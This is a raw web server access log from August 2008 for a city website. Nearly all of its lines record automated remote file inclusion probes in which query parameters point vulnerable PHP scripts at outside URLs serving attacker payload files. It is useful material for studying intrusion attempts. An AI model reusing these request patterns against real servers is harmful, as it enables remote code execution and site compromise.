89.108.66.188 - - [31/Aug/2008:20:16:01 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:16:01 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:16:02 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
89.108.66.188 - - [31/Aug/2008:20:16:02 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:16:17 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:16:20 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:16:49 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:16:51 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:16:55 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:17:16 -0700] "GET /logs/access_080329.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [31/Aug/2008:20:19:34 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [31/Aug/2008:20:19:35 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [31/Aug/2008:20:19:43 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:20:20 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:20:20 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:20:20 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:20:24 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:20:24 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:20:24 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.98.192.98 - - [31/Aug/2008:20:20:36 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.98.192.98 - - [31/Aug/2008:20:20:36 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
67.19.216.122 - - [31/Aug/2008:20:21:49 -0700] "GET /logs/access.log//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.19.216.122 - - [31/Aug/2008:20:21:49 -0700] "GET //errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.19.216.122 - - [31/Aug/2008:20:21:50 -0700] "GET /logs//errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:23:56 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:23:56 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:23:56 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:25:22 -0700] "GET /logs/access_080701.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:25:22 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:25:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:26:49 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:26:49 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:26:50 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:20:28:10 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:20:28:10 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.53.98.146 - - [31/Aug/2008:20:28:10 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:28:24 -0700] "GET /default.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:28:24 -0700] "GET /logs/access_080401.log/default.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:28:25 -0700] "GET /logs/default.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:28:52 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:28:52 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "cityofarkadelphia.com"
89.111.176.116 - - [31/Aug/2008:20:29:01 -0700] "GET /logs/access_080401.log/lib/gore.php?libpath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [31/Aug/2008:20:29:01 -0700] "GET /lib/gore.php?libpath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [31/Aug/2008:20:29:01 -0700] "GET /logs/lib/gore.php?libpath=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:31:25 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:31:25 -0700] "GET /htmltonuke.php?filnavn=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:31:25 -0700] "GET /logs/access_080701.log/htmltonuke.php?filnavn=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
203.199.149.72 - - [31/Aug/2008:20:32:36 -0700] "GET /logs/access_080331.log/htmltonuke.php?filnavn=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:34:22 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:34:22 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.208.16.94 - - [31/Aug/2008:20:34:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:34:43 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:34:43 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:34:43 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:35:07 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:35:07 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:35:07 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:36:21 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:36:22 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
64.72.112.158 - - [31/Aug/2008:20:36:22 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:36:54 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:36:54 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:36:54 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:37:32 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:37:33 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:37:33 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.98.192.98 - - [31/Aug/2008:20:40:26 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.98.192.98 - - [31/Aug/2008:20:40:26 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:20:41:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:20:41:46 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:20:41:46 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.74.146.175 - - [31/Aug/2008:20:42:13 -0700] "GET /logs/access_080701.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:46:44 -0700] "GET /logs/access_080329.log/media.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:46:44 -0700] "GET /media.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:46:44 -0700] "GET /logs/access_080201.log/media.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:46:44 -0700] "GET /logs/media.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
12.192.82.221 - - [31/Aug/2008:20:48:31 -0700] "GET /logs/access_080701.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.202.116.5 - - [31/Aug/2008:20:48:42 -0700] "GET /logs/access_080701.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
77.74.192.227 - - [31/Aug/2008:20:48:51 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
77.74.192.227 - - [31/Aug/2008:20:48:51 -0700] "GET //config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
77.74.192.227 - - [31/Aug/2008:20:48:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
77.74.192.227 - - [31/Aug/2008:20:49:21 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://sylacaugaonline.info/joomla/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:20:49:40 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:20:49:40 -0700] "GET //index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
193.207.106.54 - - [31/Aug/2008:20:49:40 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:50:24 -0700] "GET /logs/access_080531.log/media.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.222.40.169 - - [31/Aug/2008:20:52:01 -0700] "GET /logs/access_080701.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:54:19 -0700] "GET /logs/access_071101.log/view.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:54:19 -0700] "GET /logs/view.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.25.180.198 - - [31/Aug/2008:20:54:19 -0700] "GET /view.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:20:54:21 -0700] "GET /logs/access_080601.log//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:20:54:21 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:20:54:21 -0700] "GET //index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.116.188.143 - - [31/Aug/2008:20:54:42 -0700] "GET /logs/access_080401.log//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.116.188.143 - - [31/Aug/2008:20:54:47 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
195.116.188.143 - - [31/Aug/2008:20:54:53 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
89.218.85.18 - - [31/Aug/2008:20:54:57 -0700] "GET /logs/access_080201.log/errors.php?error=http://www.marioni.info/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
207.249.0.39 - - [31/Aug/2008:20:54:58 -0700] "GET /logs/access_080701.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.248.110.152 - - [31/Aug/2008:20:55:13 -0700] "GET /logs/access_080701.log//index.php?option=com_custompages&cpage=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.101.4.49 - - [31/Aug/2008:20:55:20 -0700] "GET /logs/access.log//errors.php?DOCUMENT_ROOT=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.101.4.49 - - [31/Aug/2008:20:55:20 -0700] "GET //errors.php?DOCUMENT_ROOT=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.101.4.49 - - [31/Aug/2008:20:55:20 -0700] "GET /logs//errors.php?DOCUMENT_ROOT=http://ontheribbon.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:55:48 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:55:48 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:55:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:55:52 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [31/Aug/2008:20:56:21 -0700] "GET /logs/access_080101.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
80.67.19.103 - - [31/Aug/2008:20:59:20 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 917 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
80.67.19.103 - - [31/Aug/2008:20:59:20 -0700] "GET /logs/access_080101.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
80.67.19.103 - - [31/Aug/2008:20:59:20 -0700] "GET /logs//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
80.67.19.103 - - [31/Aug/2008:20:59:39 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:21:02:14 -0700] "GET /logs/access.log//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:21:02:18 -0700] "GET //include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
217.147.236.10 - - [31/Aug/2008:21:02:20 -0700] "GET /logs//include/write.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
